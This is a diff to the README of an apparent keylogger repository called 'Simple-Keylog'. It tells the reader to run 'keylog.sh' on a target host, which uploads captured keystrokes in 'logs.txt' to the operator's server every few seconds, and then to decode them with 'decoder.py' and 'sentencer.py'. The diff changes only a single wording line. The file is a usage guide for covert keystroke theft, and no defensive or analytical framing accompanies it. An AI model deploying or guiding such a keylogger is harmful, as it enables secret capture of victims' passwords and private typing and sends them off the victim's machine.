cons0le7/Simple-Keylog/README.md

 - Run "keylog.sh" on target host.
 - "logs.txt" will upload to your server and update every X number of seconds according to your specification.
 - Move "decoder.py" and "sentencer.py" to the same directory of server as "logs.txt" or create a new folder and add all files to it.
-- cd to directory where both files are contained and you can either run:
+- cd to directory where the files are contained and you can either run:
 ```
 python3 decoder.py
 ```